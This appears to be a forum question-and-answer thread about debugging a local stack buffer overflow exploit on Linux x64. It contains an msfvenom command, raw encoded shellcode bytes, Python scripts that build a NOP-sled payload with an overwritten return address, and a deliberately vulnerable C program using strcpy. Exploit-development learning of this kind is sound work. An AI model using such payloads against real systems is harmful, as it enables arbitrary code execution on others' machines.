0

I use msfvenom generated shellcode in buffer overflow. Here's command that i used to create shellcode for linux x64:

msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami

and here's my python code to generate input.txt to read input from that file as payload.

#!/usr/bin/python
from struct import *
buffer = ''
buffer += '\x90'*177
buffer += b"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d"
buffer += b"\x05\xef\xff\xff\xff\x48\xbb\x0c\xba\x64\x29\x60"
buffer += b"\x92\x04\x0b\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buffer += b"\xff\xe2\xf4\x44\x02\x4b\x4b\x09\xfc\x2b\x78\x64"
buffer += b"\xba\xfd\x79\x34\xcd\x56\x6d\x64\x97\x07\x7d\x3e"
buffer += b"\xc0\xec\x0c\x0c\xba\x64\x5e\x08\xfd\x65\x66\x65"
buffer += b"\xba\x32\x7e\x34\xcc\x6e\x30\x54\xb5\x61\x29\x60"
buffer += b"\x92\x04\x0b"
buffer += pack("<Q", 0x7fffffffd8c0)
f = open("input.txt", "w")
f.write(buffer)

Here's my main vulnerable code.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int copytobuffer(char* input)
{
 char buffer[256];
 strcpy (buffer,input);
 return 0;
}

void main (int argc, char *argv[])
{
 int local_variable = 1;
 copytobuffer(argv[1]);
 exit(0);
}

i need 264 bytes payload to override return address above python code will generate payload for that, but the bigges problem is that, shellcode contains 0x00 bad characters, even i use -b '0x00' argument in msfvenom.

enter image description here

as we can see above screenshot gdb shows 0x00 bytes in shellcode(0x7fffffffd948) after 0x90(NOPs). I think that is the main reason why i cannot run command. so basically buffer contains about 216 bytes until that 0x00 bytes because of that buffer[256] not filled and program exit normally.

Is there any way to generate shellcode without that bad characters, as i experienced msfvenom -b option not work correctly.

Improve this question
2
  • The shellcode CLEARLY doesn't contain null bytes, you can see it from the python code. Your bytes stop at the byte with value 0x09, i.e. a TAB. Are you passing the payload correctly in the command line? Commented 2 days ago
  • @Margaret Bloom, thanks for your answer, but the problem was, due to where i placed that shellcode, basically that shellcode contains push and pop intructions, that interfere that shellcode and somewhere in that shellcode it pushes 0x00's into memory that was the main reason for that exploit. basically after placing shellcode first, then placing 0x90(NOP's) solved my problem. Commented 2 days ago

1 Answer 1

Reset to default
0

The shellcode is not executing correctly because its location near the stack pointer (rsp) interacts poorly with its internal push/pop logic, which may be inadvertently pushing 0x00 (null bytes) onto the stack.

Short answer is: I solved that by inserting shellcode before the 0x90 NOPs here's python code:

#!/usr/bin/python
from struct import *
import sys
buffer = b''
buffer+= b"\x48\x31\xc9\x48\x81\xe9\xfa\xff\xff\xff\x48\x8d"
buffer+= b"\x05\xef\xff\xff\xff\x48\xbb\x2e\x99\x72\x9d\x84"
buffer+= b"\xbe\xc0\x63\x48\x31\x58\x27\x48\x2d\xf8\xff\xff"
buffer+= b"\xff\xe2\xf4\x66\x21\x5d\xff\xed\xd0\xef\x10\x46"
buffer+= b"\x99\xeb\xcd\xd0\xe1\x92\x05\x46\xb4\x11\xc9\xda"
buffer+= b"\xec\x28\x64\x2e\x99\x72\xea\xec\xd1\xa1\x0e\x47"
buffer+= b"\x99\x24\xca\xd0\xe0\xaa\x58\x76\x96\x77\x9d\x84"
buffer+= b"\xbe\xc0\x63"
buffer += b'\x90'*177  
buffer += pack("<Q", 0x7fffffffd870)
print(sys.getsizeof(buffer))
f = open("input.txt", "wb")
f.write(buffer)

that solved my problem.

Improve this answer
2
  • 1
    This is most likely not the real answer. The shellcode is just a standard Shikata ga nai encoder (i.e. a plain-old xor) and straightforward call to execve using a literal pool technique. It pushes a little amount of data on the stack and surely not zeros. While the stack pointer being close to the shellcode code is a common situation, it doesn't produces zero bytes but more erratic behaviour (data as code). I advice you to really understand what were going on (most likely you were passing it wrong) if you are serious about exploit design. You cannot be sloppy in this field. Commented 2 days ago
  • @Margaret Bloom maybe you are right, im new in that field, i have experience with malware dev, software dev but exploit dev field is completely unknown for me. thanks again Commented yesterday

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.